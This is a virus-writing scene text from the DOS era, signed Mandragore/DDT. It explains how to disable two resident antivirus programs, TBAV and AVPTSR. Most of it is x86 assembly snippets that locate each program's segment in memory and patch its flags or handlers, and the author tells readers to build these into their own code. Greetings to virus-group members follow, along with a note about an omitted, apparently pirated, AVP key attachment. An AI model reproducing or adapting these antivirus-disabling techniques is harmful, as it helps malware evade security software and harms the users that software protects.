+---------------------------------------+
| How to disable some residents shields |   Mandragore/DDT
+---------------------------------------+

HOW TO disable some residents shields
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===> TBAV - fairly easy, based on the "eb 0" method: we just have to disable
TBDRIVER, since all the other modules work through it... so you need to get the
TBDRIVER segment. Here's a way to get it:

    mov  ax,1605h        ; test if the system is ready for winblows launching
    mov  dx,1            ; some magic values
    xor  cx,cx           ;  "     "     "
    int  2fh             ; 'multiplexor funcs' -> es = TBDRIVER segment

Now you just have to patch the argument of a jmp (0xeb) at seg:290h:

    mov  byte ptr es:[291h],0

They're just disabled, and their residency check still works! The only problem
is that the previous false warnings are suppressed too :(

===> AVPTSR - not so well known but it works well; from the AVP toolkit. It
hooks int 22h for its work, so there's a fixed value in the PSP at offset +10
(0Ah) for int 22h: 3F5Ch. It's the offset of the AVPTSR int 22h hooker. What we
need here is to get the segment, once again:

    mov  si,3f5ch
    cmp  word ptr ds:[0ah],si
    jne  no_avptsr
    mov  ds,ds:[0ch]

Okay... now let's look at the option byte (seg:23ADh):

    bit 7   'Registers'         ???
    bit 6   'Check all files'   self-explanatory
    bit 5   'Scan on exec'      self-explanatory
    bit 4   'Dangerous call'    used for int 2fh
    bit 3   'Write to sector'   self-explanatory
    bit 2   'Format sector'     leave this flag alone ;)
    bit 1   'Memory check'      see below...
    bit 0   'Access to file'    int 21h subfunctions 3d/40/43/57/...

Here's the simple way to alter it:

    and  word ptr ds:[23adh],0feh    ; disable 'access to file' only

Mem check: there's a small problem... the flag is tested before the execution,
so we have to disable (for example) the int 22h handler:

    mov  byte ptr ds:[si],0cfh       ; put an iret there

The problem: if something else hooks int 22h after AVPTSR, you can't guess it's
there, and their 'already resident' check is to display an AV string :(

Now it's your work to include it nicely in your own code, and use it while it
works...
This txt was a pretext to put my personal greetz ;)

  URG0      keep those maths away from me, but bring me some ED beers :)
  Mi$t      keep workin'! but beware of the urgo32 scepticism :P
  T-2000    i didn't forget you this time :) go back on IRC sometimes
  Darkman   after 12 years old, girlies aren't out of date!
  Reptile   0ne day i'll smoke ya |)~
  Yesna     hold reptile a moment plz....
  Buzz      prepare to run
  Virus-ex  nothing xcept >/dev/null
  Owl       keep da good work!

all girlz who come sometimes on #vir, lemme hypnotise ya ;)
and of course, respects to all DDT mmbrz!!

                                            --- Mandragore

bonus :) i know that some of you don't already get it !

[uuencoded attachment "AVP.KEY" followed here; the encoded data is corrupted
in this copy and is not reproduced]